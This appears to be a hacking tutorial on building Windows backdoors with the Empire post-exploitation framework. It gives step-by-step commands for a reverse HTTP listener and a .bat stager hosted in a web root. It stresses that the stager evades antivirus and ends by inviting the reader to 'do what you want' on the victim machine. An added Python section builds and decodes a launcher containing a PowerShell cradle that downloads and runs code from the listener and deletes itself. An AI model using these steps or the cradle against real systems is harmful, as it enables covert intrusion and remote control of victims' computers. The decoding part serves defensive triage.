Hi Hackers of How To KR! Welcome back to a new tutorial. Today I'm going to show you how to create backdoors with Empire, which works differently from a Metasploit payload and, at the time of writing, slipped past most anti-virus programs. We can generate backdoors for
Empire is a post-exploitation framework that includes a pure PowerShell 2.0 Windows agent and a pure Python 2.6/2.7 Linux / OS X agent. It's a fusion of the previous PowerShell Empire and Python EmPyre projects. The platform provides cryptographically secure communications and a robust architecture.
Empire doesn't come preinstalled in Kali, so we have to install it first. Let's start the process =>
Step 1: Installation
First we clone the Empire repository from GitHub. As usual, start from the terminal.
Then change into the setup directory of the cloned repository.
Here you can see the install.sh file, which is the installer. Run it with the given command (it pulls in system packages, so it needs root privileges).
Wait until the installer has finished. In this tutorial Empire lives in /opt/Empire, so cd into that directory before running it.
Now start the tool with the empire script in that directory (not the installer again).
Empire is now open. Let's get our hands dirty.
Step 2: Creating a listener
The first thing we do is set up a listener so that we receive a connection whenever the backdoor is executed on the target machine. We use a reverse connection: every time the backdoor runs, it connects back to our machine instead of us connecting to it. This is less visible and gets through many firewalls, because from the network's point of view it is just an outbound HTTP connection from the target. You can see that a fresh Empire starts with zero listeners. To create one, enter the listeners menu and follow these steps:
listeners
uselistener (then press the Tab key twice)
Now you can see all the listener types available. For now we use the http listener.
This is very similar to using multi/handler in Metasploit. So let's select the http listener:
uselistener http
Any of the listener options can be changed with the set command.
Let's set the port, and the Host the stager will call back to (the host must use the same port):
set Port 8080
set Host http://192.168.99.149:8080
Now the port is set to 8080 and the Host points at our Kali machine.
We are all set; type execute to create and start the listener.
Going back to the main menu does not affect the listener; it keeps running in the background as long as Empire is running.
Step 3: Creating a Backdoor
To create a backdoor (Empire calls it a stager), follow these steps =>
usestager (press the Tab key twice to list the available stagers)
You can see many types of backdoor. For now we create the Windows batch launcher, which is the stager that produces a .bat file:
usestager windows/launcher_bat
Now set the Listener option to the name of the listener we created, http:
set Listener http
Now set the OutFile. You can write it anywhere you want; here it goes under Apache's web root, /var/www/html, so it can be downloaded to the target:
set OutFile /var/www/html/evil-files/empire_http_8080.bat
Now enter the execute command and the .bat file is written to the OutFile path.
Now let's check whether or not antivirus detects the file.
Only two antivirus engines detected it. That is the result at the time of writing; detection rates change quickly as signatures are updated, and uploading a sample to a multi-engine scanner shares it with the vendors, so do not expect the same number today. Now let's test it on the Windows computer.
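To see why the detection count is so low, it helps to look at what the .bat stager actually is. The following is an added example written for this tutorial, not Empire's own code: the windows/launcher_bat stager writes a batch file whose only real content is a base64-encoded, UTF-16LE PowerShell one-liner run with powershell -noP -sta -w 1 -enc ...; a scanner that only looks at the .bat sees a few lines of batch plus base64, while the agent itself is fetched from the listener at run time. The script below builds such a launcher and then does what a sandbox or an analyst does first: finds the encoded argument, decodes it, and pulls out the listener URL (the Host we set above) and the window-hiding switches. The launcher body is constructed for this example; the download cradle and the /index.asp path are placeholders, not Empire's real launcher code or default URIs.

```python
"""Unwrap an Empire-style .bat launcher and report its indicators.

Added example for this tutorial, not part of Empire. The PowerShell body and
the /index.asp path below are CONSTRUCTED placeholders; only the encoding
scheme (base64 of UTF-16LE, passed to -enc) mirrors what such launchers do.
"""
import base64
import re

# The tutorial's listener Host; the path is a made-up placeholder.
SAMPLE_LISTENER = "http://192.168.99.149:8080"
SAMPLE_PS = (
    "$wc=New-Object System.Net.WebClient;"
    "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
    f"IEX $wc.DownloadString('{SAMPLE_LISTENER}/index.asp')"
)

# Switches that keep the PowerShell window, profile and policy out of the way.
QUIET_SWITCHES = {
    "-nop", "-noprofile",          # skip profile scripts (and any hooks in them)
    "-noni", "-noninteractive",
    "-sta",                        # single-threaded apartment
    "-w", "-windowstyle",          # -w 1 / -WindowStyle Hidden
    "-ep", "-exec", "-executionpolicy",
}
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def make_launcher_bat(ps_script: str) -> str:
    """Wrap a PowerShell script the way launcher-style .bat stagers do.

    powershell.exe -EncodedCommand expects base64 of the UTF-16LE script.
    The last line deletes the batch file itself (%~f0 is its own full path).
    """
    enc = base64.b64encode(ps_script.encode("utf-16-le")).decode("ascii")
    return (
        "@echo off\r\n"
        f"start /b powershell -noP -sta -w 1 -enc {enc}\r\n"
        'start /b "" cmd /c del "%~f0"&exit /b\r\n'
    )


def is_encoded_command_switch(token: str) -> bool:
    """powershell.exe accepts -e, -ec and any prefix of -EncodedCommand (-en, -enc, ...)."""
    t = token.lower()
    return t in ("-e", "-ec") or (len(t) >= 3 and "-encodedcommand".startswith(t))


def decode_encoded_command(b64: str) -> str:
    """Reverse the encoding: base64 -> UTF-16LE bytes -> script text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def triage_launcher(bat_text: str) -> dict:
    """Report what a .bat launcher would do, without running it."""
    report = {
        "encoded_command": False,
        "switches": [],
        "decoded_script": "",
        "urls": [],
        "self_deletes": False,
    }
    for line in bat_text.splitlines():
        low = line.lower()
        if "del" in low and "%~f0" in low:
            report["self_deletes"] = True
        if "powershell" not in low:
            continue
        tokens = line.split()
        for i, tok in enumerate(tokens):
            if tok.lower() in QUIET_SWITCHES:
                report["switches"].append(tok)
            if is_encoded_command_switch(tok) and i + 1 < len(tokens):
                report["encoded_command"] = True
                report["decoded_script"] = decode_encoded_command(tokens[i + 1])
                report["urls"] = URL_RE.findall(report["decoded_script"])
    return report


if __name__ == "__main__":
    bat = make_launcher_bat(SAMPLE_PS)
    print(bat)
    for key, value in triage_launcher(bat).items():
        print(f"{key}: {value}")
```

The decoded script is what command-line logging, PowerShell script block logging or an EDR sees when the .bat runs, and the Host URL in it is the indicator a defender blocks; a low static detection count on the .bat says little about whether the callback gets noticed.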
After we double-click the .bat file on Windows, a connection comes back to our Kali machine and Empire shows a new agent like this.
To interact with the Windows machine we just have to type
interact <agent name>
We have successfully got a session on the victim machine. Now do what you want 🙂
This is for educational purposes only. Do not use it to harm others!